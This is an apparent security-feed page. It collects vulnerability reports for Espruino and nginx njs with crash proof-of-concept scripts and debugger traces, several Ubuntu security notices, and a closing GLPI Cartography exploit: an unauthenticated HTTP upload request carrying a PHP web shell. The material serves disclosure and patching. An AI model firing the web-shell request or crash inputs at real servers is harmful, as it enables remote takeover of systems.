Buffer Overflow vulnerability found in Espruino 2v05.41 allows an attacker to cause a denial of service via the function jsvGarbageCollectMarkUsed in file src/jsvar.c.

Hello,  
I found that IIlegal memory access may lead to arbitrary memory write inside jsvGarbageCollectMarkUsed . When Object property name is marked ，it will be regarfed as nativeStr struct. And read content pointed by property name and marked，which will result arbitrary memory write.  
Please confirm~~  
poc is here:  
espruino1.js.zip

test version:  
commit d543731 (HEAD -> master, origin/master, origin/HEAD) (20200505)

environment

gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0  
run ./espruino poc  
(gdb) r  
Starting program: /home/zdz/Espruino/espruino /home/zdz/debugBug/espruino1.js  
\[Thread debugging using libthread\_db enabled\]  
Using host libthread\_db library "/lib/x86\_64-linux-gnu/libthread\_db.so.1".  
\[New Thread 0x7ffff6e85700 (LWP 4410)\]

| |\_ \_\_\_ \_\_\_ \_ ||\_\_\_ \_\_\_  
| | -| . | | | | | | . |  
||| || |||||\_|  
|| espruino.com  
2v05.41 (c) 2019 G.Williams

Espruino is Open Source. Our work is supported  
only by sales of official boards and donations:  
http://espruino.com/Donate

{ }

Thread 1 "espruino" received signal SIGSEGV, Segmentation fault.  
jsvIsString (  
v=<error reading variable: Cannot access memory at address 0x7fffff7feff0>) at src/jsvar.c:73  
73 bool jsvIsString(const JsVar \*v) { return v && (v->flags&JSV\_VARTYPEMASK)>=\_JSV\_STRING\_START && (v->flags&JSV\_VARTYPEMASK)<=\_JSV\_STRING\_END; } ///< String, or a NAME too  
(gdb) bt  
#0 jsvIsString (  
v=<error reading variable: Cannot access memory at address 0x7fffff7feff0>) at src/jsvar.c:73  
#1 0x0000555555565728 in jsvHasCharacterData (v=0x7ffff6644610)  
at src/jsvar.c:384  
#2 0x000055555556f8d2 in jsvGarbageCollectMarkUsed (var=0x7ffff6644610)  
at src/jsvar.c:3715  
#3 0x000055555556f97a in jsvGarbageCollectMarkUsed (var=0x7ffff6644650)  
at src/jsvar.c:3730  
#4 0x000055555556f9cb in jsvGarbageCollectMarkUsed (var=0x7ffff6644670)  
at src/jsvar.c:3738

Dongzhuo Zhao working with ADLab of Venustech

CVE-2020-23257: IIlegal memory access may lead to arbitrary memory write inside jsvGarbageCollectMarkUsed  · Issue #1820 · espruino/Espruino

Buffer Overflow found in Nginx NJS allows a remote attacker to execute arbitrary code via the njs_object_property parameter of the njs/njs_vm.c function.

**env**

ubuntu 18.04  
njs 0feca92  
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)  
built with ASAN on

**bug**

\> (1..\_\_proto\_\_.length \= '1', Array.prototype.slice.call(1, 0, 2)).toString()
ASAN:SIGSEGV
\===\=\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\=
\==13918\==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000407181 bp 0x7ffdf2511450 sp 0x7ffdf2511430 T0)
    #0 0x407180 in nxt\_lvlhsh\_find nxt/nxt\_lvlhsh.c:181
    #1 0x4479b7 in njs\_object\_property njs/njs\_object\_property.c:757
    #2 0x4210c2 in njs\_primitive\_value njs/njs\_vm.c:2987
    #3 0x4206ec in njs\_vmcode\_string\_argument njs/njs\_vm.c:2864
    #4 0x41473f in njs\_vmcode\_interpreter njs/njs\_vm.c:159
    #5 0x412c4e in njs\_vm\_start njs/njs.c:594
    #6 0x404a75 in njs\_process\_script njs/njs\_shell.c:771
    #7 0x40387b in njs\_interactive\_shell njs/njs\_shell.c:501
    #8 0x402ad1 in main njs/njs\_shell.c:271

njs scripts have no remote access, so the attacker can't control them and thus it's not a remote code execution.

emmmm, but i think this may cause at least cpde execution, if u can control the js it executed.Maybe LPE?

…

\---Original--- From: "Valentin V. Bartenev"<notifications@github.com> Date: Wed, Jul 3, 2019 15:53 PM To: "nginx/njs"<njs@noreply.github.com>; Cc: "Author"<author@noreply.github.com>;"lokihardt"<nine.twelve@foxmail.com>; Subject: Re: \[nginx/njs\] Logic problems happen in the nxt\_lvlhsh.c (#188) njs scripts have no remote access, so the attacker can't control them and thus it's not a remote code execution. — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub, or mute the thread.

@l0kihardt

njs is used for nginx configuration and is not an application server. njs **only** executes js code from a static file which is a part of nginx config file (which **must** be trusted source anyway).

@l0kihardt If you can control njs script on a server, then you already have a root access and can control the whole server without any bugs needed.

 xeioex changed the title Logic problems happen in the nxt\_lvlhsh.c Array elements left uninitialized in Array.prototype.slice() for primitive this values.

Jul 3, 2019

Yeah sure, I use ubuntu 18.04, and did something like this \`\`\` export CC=clang export CFLAGS=-fsanitize=address ./configure make \`\`\`

…

\------------------ 原始邮件 ------------------ 发件人: "Dmitry Volyntsev"<notifications@github.com>; 发送时间: 2019年7月3日(星期三) 下午4:07 收件人: "nginx/njs"<njs@noreply.github.com>; 抄送: "3087136937"<nine.twelve@foxmail.com>;"Mention"<mention@noreply.github.com>; 主题: Re: \[nginx/njs\] Logic problems happen in the nxt\_lvlhsh.c (#188) @l0kihardt please, also share the way you run your POC. Cannot reproduce it (with ASAN enabled). $ cat github188.js var \_export = 1; \_export.\_\_proto\_\_.length= \_export.\_\_proto\_\_.sum = \[1\].slice Error(\_export.sum((\_export.\_\_proto\_\_.length= \[1\].toString(RegExp(Error()))) ===('loading exception'))) //export default \_export; \_export; console.log(\_export) $ ./build/njs github188.js 1 — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or mute the thread.

CVE-2020-19695: Array elements left uninitialized in Array.prototype.slice() for primitive this values. · Issue #188 · nginx/njs

An issue found in Espruino Espruino 6ea4c0a allows an attacker to execute arbitrrary code via oldFunc parameter of the jswrap_object.c:jswrap_function_replacewith endpoint.

**env**

Ubuntu 18.04  
Espruino 6ea4c0a

**bug**

This is a critical bug which will cause memory corruption at last, thus may cause potential remote code execution threat to the users.

It happens at jswrap_object.c:jswrap_function_replacewith:, so if we pass the parameter oldFunc with a null pointer, it may crash. If we provide the oldFunc with another address or another number, it may cause remote code execution.

void jswrap\_function\_replaceWith(JsVar \*oldFunc, JsVar \*newFunc) {
  if (!jsvIsFunction(newFunc)) {
    jsExceptionHere(JSET\_TYPEERROR, "First argument of replaceWith should be a function - ignoring");
    return;
  }
  // If old was native or vice versa...
  if (jsvIsNativeFunction(oldFunc) != jsvIsNativeFunction(newFunc)) {
    if (jsvIsNativeFunction(newFunc))
      oldFunc->flags |= JSV\_NATIVE;
    else
      oldFunc->flags &= ~JSV\_NATIVE;
  }
  // If old fn started with 'return' or vice versa...
  if (jsvIsFunctionReturn(oldFunc) != jsvIsFunctionReturn(newFunc)) {
    if (jsvIsFunctionReturn(newFunc))
      oldFunc->flags = (oldFunc->flags&~JSV\_VARTYPEMASK) |JSV\_FUNCTION\_RETURN;
    else
      oldFunc->flags = (oldFunc->flags&~JSV\_VARTYPEMASK) |JSV\_FUNCTION;
  }

**poc**

var a "should equal";
for (var i in a)
    a\[i\]\=i;

function test(a,b) {
    return 1;
}

E.mapInPlace.replaceWith.call(a, function(x) {
    return test(\[\].map.call("Hello", function(x) {
        return x + 1;
    }), "H1,e1,l1,l1,o1");
});

CVE-2020-19693: A memory corruption bug in the jswrap_object.c · Issue #1684 · espruino/Espruino

Buffer Overflow vulnerabilty found in Nginx NJS v.0feca92 allows a remote attacker to execute arbitrary code via the njs_module_read in the njs_module.c file.

**env**

ubuntu 18.04  
njs 0feca92  
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)

**bug**

So, actually this is a logic bug, happened under an really interesting circumstance.  
the buggy function is the njs\_module\_read in the file njs\_module.c

if (fstat(fd, &sb) == -1) {
        goto fail;
    }

    text->length = nxt\_length(NJS\_MODULE\_START);

    if (S\_ISREG(sb.st\_mode) && sb.st\_size) {
        text->length += sb.st\_size;
    }

    text->length += nxt\_length(NJS\_MODULE\_END);

    text->start = nxt\_mp\_alloc(vm->mem\_pool, text->length);
    if (text->start == NULL) {
        goto fail;
    }

    p = nxt\_cpymem(text->start, NJS\_MODULE\_START, nxt\_length(NJS\_MODULE\_START));

    n = read(fd, p, sb.st\_size);

as you can see, it read the sb.st\_size and sb.st\_mode with function fstat. However if we dont provide a common .js file. the S\_ISREG(sb.st\_mode) will be 0. text->length wont be updated.  
and read(fd, p, sb.st\_size); still read sb.st\_size bytes into the p. p is on the heap. So we can overflow to the next chunk on the heap....

**poc**

CVE-2020-19692: Heap based buffer overflow in njs_module.c · Issue #187 · nginx/njs

Ubuntu Security Notice 5995-1 - It was discovered that Vim incorrectly handled memory when opening certain files. If an attacker could trick a user into opening a specially crafted file, it could cause Vim to crash, or possible execute arbitrary code. This issue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

    =========================================================================Ubuntu Security Notice USN-5995-1April 04, 2023vim vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 14.04 ESMSummary:Several security issues were fixed in Vim.Software Description:- vim: Vi IMproved - enhanced vi editorDetails:It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS,and Ubuntu 22.04 LTS. (CVE-2022-0413, CVE-2022-1629, CVE-2022-1674,CVE-2022-1733, CVE-2022-1735, CVE-2022-1785, CVE-2022-1796, CVE-2022-1851,CVE-2022-1898, CVE-2022-1942, CVE-2022-1968, CVE-2022-2124, CVE-2022-2125,CVE-2022-2126, CVE-2022-2129, CVE-2022-2175, CVE-2022-2183, CVE-2022-2206,CVE-2022-2304, CVE-2022-2345, CVE-2022-2581)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04LTS. (CVE-2022-1720, CVE-2022-2571, CVE-2022-2845, CVE-2022-2849,CVE-2022-2923)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-1927,CVE-2022-2344)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS,and Ubuntu 22.10. (CVE-2022-2946)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10.(CVE-2022-2980)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  vim                             2:9.0.0242-1ubuntu1.3  vim-athena                      2:9.0.0242-1ubuntu1.3  vim-gtk3                        2:9.0.0242-1ubuntu1.3  vim-motif                       2:9.0.0242-1ubuntu1.3  vim-nox                         2:9.0.0242-1ubuntu1.3  vim-tiny                        2:9.0.0242-1ubuntu1.3Ubuntu 22.04 LTS:  vim                             2:8.2.3995-1ubuntu2.5  vim-athena                      2:8.2.3995-1ubuntu2.5  vim-gtk                         2:8.2.3995-1ubuntu2.5  vim-gtk3                        2:8.2.3995-1ubuntu2.5  vim-nox                         2:8.2.3995-1ubuntu2.5  vim-tiny                        2:8.2.3995-1ubuntu2.5Ubuntu 20.04 LTS:  vim                             2:8.1.2269-1ubuntu5.13  vim-athena                      2:8.1.2269-1ubuntu5.13  vim-gtk                         2:8.1.2269-1ubuntu5.13  vim-gtk3                        2:8.1.2269-1ubuntu5.13  vim-nox                         2:8.1.2269-1ubuntu5.13  vim-tiny                        2:8.1.2269-1ubuntu5.13Ubuntu 18.04 LTS:  vim                             2:8.0.1453-1ubuntu1.12  vim-athena                      2:8.0.1453-1ubuntu1.12  vim-gnome                       2:8.0.1453-1ubuntu1.12  vim-gtk                         2:8.0.1453-1ubuntu1.12  vim-gtk3                        2:8.0.1453-1ubuntu1.12  vim-nox                         2:8.0.1453-1ubuntu1.12  vim-tiny                        2:8.0.1453-1ubuntu1.12Ubuntu 14.04 ESM:  vim                             2:7.4.052-1ubuntu3.1+esm8  vim-athena                      2:7.4.052-1ubuntu3.1+esm8  vim-gnome                       2:7.4.052-1ubuntu3.1+esm8  vim-gtk                         2:7.4.052-1ubuntu3.1+esm8  vim-nox                         2:7.4.052-1ubuntu3.1+esm8  vim-tiny                        2:7.4.052-1ubuntu3.1+esm8In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5995-1  CVE-2022-0413, CVE-2022-1629, CVE-2022-1674, CVE-2022-1720,  CVE-2022-1733, CVE-2022-1735, CVE-2022-1785, CVE-2022-1796,  CVE-2022-1851, CVE-2022-1898, CVE-2022-1927, CVE-2022-1942,  CVE-2022-1968, CVE-2022-2124, CVE-2022-2125, CVE-2022-2126,  CVE-2022-2129, CVE-2022-2175, CVE-2022-2183, CVE-2022-2206,  CVE-2022-2304, CVE-2022-2344, CVE-2022-2345, CVE-2022-2571,  CVE-2022-2581, CVE-2022-2845, CVE-2022-2849, CVE-2022-2923,  CVE-2022-2946, CVE-2022-2980Package Information:  https://launchpad.net/ubuntu/+source/vim/2:9.0.0242-1ubuntu1.3  https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.5  https://launchpad.net/ubuntu/+source/vim/2:8.1.2269-1ubuntu5.13  https://launchpad.net/ubuntu/+source/vim/2:8.0.1453-1ubuntu1.12

Ubuntu Security Notice USN-5995-1

Ubuntu Security Notice 5994-1 - It was discovered that HAProxy incorrectly initialized certain connection buffers. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5994-1  
April 03, 2023

haproxy vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

HAProxy could be made to expose sensitive information over the network.

Software Description:  
- haproxy: fast and reliable load balancing reverse proxy

Details:

It was discovered that HAProxy incorrectly initialized certain connection  
buffers. A remote attacker could possibly use this issue to obtain  
sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   haproxy                         2.4.18-1ubuntu1.3

Ubuntu 22.04 LTS:  
   haproxy                         2.4.18-0ubuntu1.3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5994-1  
   CVE-2023-0836

Package Information:  
   https://launchpad.net/ubuntu/+source/haproxy/2.4.18-1ubuntu1.3  
   https://launchpad.net/ubuntu/+source/haproxy/2.4.18-0ubuntu1.3

Ubuntu Security Notice USN-5994-1

Ubuntu Security Notice 5993-1 - Demi Marie Obenour discovered that the Samba LDAP server incorrectly handled certain confidential attribute values. A remote authenticated attacker could possibly use this issue to obtain certain sensitive information. Andrew Bartlett discovered that the Samba AD DC admin tool incorrectly sent passwords in cleartext. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5993-1  
April 03, 2023

samba vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Samba could be made to expose sensitive information over the network.

Software Description:  
- samba: SMB/CIFS file, print, and login server for Unix

Details:

Demi Marie Obenour discovered that the Samba LDAP server incorrectly  
handled certain confidential attribute values. A remote authenticated  
attacker could possibly use this issue to obtain certain sensitive  
information. (CVE-2023-0614)

Andrew Bartlett discovered that the Samba AD DC admin tool incorrectly  
sent passwords in cleartext. A remote attacker could possibly use this  
issue to obtain sensitive information. (CVE-2023-0922)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   samba                           2:4.16.8+dfsg-0ubuntu1.1

Ubuntu 22.04 LTS:  
   samba                           2:4.15.13+dfsg-0ubuntu1.1

Ubuntu 20.04 LTS:  
   samba                           2:4.15.13+dfsg-0ubuntu0.20.04.2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5993-1  
   CVE-2023-0614, CVE-2023-0922

Package Information:  
   https://launchpad.net/ubuntu/+source/samba/2:4.16.8+dfsg-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/samba/2:4.15.13+dfsg-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/samba/2:4.15.13+dfsg-0ubuntu0.20.04.2

Ubuntu Security Notice USN-5993-1

Ubuntu Security Notice 5992-1 - Demi Marie Obenour discovered that ldb, when used with Samba, incorrectly handled certain confidential attribute values. A remote authenticated attacker could possibly use this issue to obtain certain sensitive information.

    ==========================================================================Ubuntu Security Notice USN-5992-1April 03, 2023ldb vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:ldb could be made to expose sensitive information over the network.Software Description:- ldb: LDAP-like embedded databaseDetails:Demi Marie Obenour discovered that ldb, when used with Samba, incorrectlyhandled certain confidential attribute values. A remote authenticatedattacker could possibly use this issue to obtain certain sensitiveinformation.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   libldb2                         2:2.4.4-0ubuntu0.22.04.2Ubuntu 20.04 LTS:   libldb2                         2:2.4.4-0ubuntu0.20.04.2After a standard system update you need to restart applications using ldb,such as Samba, to make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5992-1   CVE-2023-0614Package Information:   https://launchpad.net/ubuntu/+source/ldb/2:2.4.4-0ubuntu0.22.04.2   https://launchpad.net/ubuntu/+source/ldb/2:2.4.4-0ubuntu0.20.04.2

Ubuntu Security Notice USN-5992-1

Ubuntu Security Notice 5966-3 - USN-5966-1 fixed vulnerabilities in amanda. Unfortunately that update caused a regression and was reverted in USN-5966-2. This update provides security fixes for Ubuntu 22.10, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-5966-3  
April 03, 2023

amanda regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in amanda.

Software Description:  
- amanda: Advanced Maryland Automatic Network Disk Archiver (Client)

Details:

USN-5966-1 fixed vulnerabilities in amanda. Unfortunately that update  
caused a regression and was reverted in USN-5966-2. This update provides  
security fixes for Ubuntu 22.10, Ubuntu 22.04 LTS, Ubuntu 20.04  
LTS and Ubuntu 18.04 LTS.

We apologize for the inconvenience.

Original advisory details:

Maher Azzouzi discovered an information disclosure vulnerability in the  
calcsize binary within amanda. calcsize is a suid binary owned by root that  
could possibly be used by a malicious local attacker to expose sensitive  
file system information. (CVE-2022-37703)

Maher Azzouzi discovered a privilege escalation vulnerability in the  
rundump binary within amanda. rundump is a suid binary owned by root that  
did not perform adequate sanitization of environment variables or  
commandline options and could possibly be used by a malicious local  
attacker to escalate privileges. (CVE-2022-37704)

Maher Azzouzi discovered a privilege escalation vulnerability in the runtar  
binary within amanda. runtar is a suid binary owned by root that did not  
perform adequate sanitization of commandline options and could possibly be  
used by a malicious local attacker to escalate privileges. (CVE-2022-37705)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
amanda-client 1:3.5.1-9ubuntu0.3

Ubuntu 22.04 LTS:  
amanda-client 1:3.5.1-8ubuntu1.3

Ubuntu 20.04 LTS:  
amanda-client 1:3.5.1-2ubuntu0.3

Ubuntu 18.04 LTS:  
amanda-client 1:3.5.1-1ubuntu0.3

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-5966-3  
https://ubuntu.com/security/notices/USN-5966-1  
https://launchpad.net/bugs/2012536  
CVE-2022-37703, CVE-2022-37704, CVE-2022-37705

Package Information:  
https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-9ubuntu0.3  
https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-8ubuntu1.3  
https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-2ubuntu0.3  
https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-1ubuntu0.3

Ubuntu Security Notice USN-5966-3

GLPI Cartography versions prior to 6.0.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: GLPI  Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)# Date of found: 11 Jun 2022# Application: GLPI Cartography < 6.0.0# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/positions# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-34128# PoCPOST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Length: 39Origin: http://192.168.56.113Connection: close<?php echo system($_GET["cmd"]); ?>

Tag

#ubuntu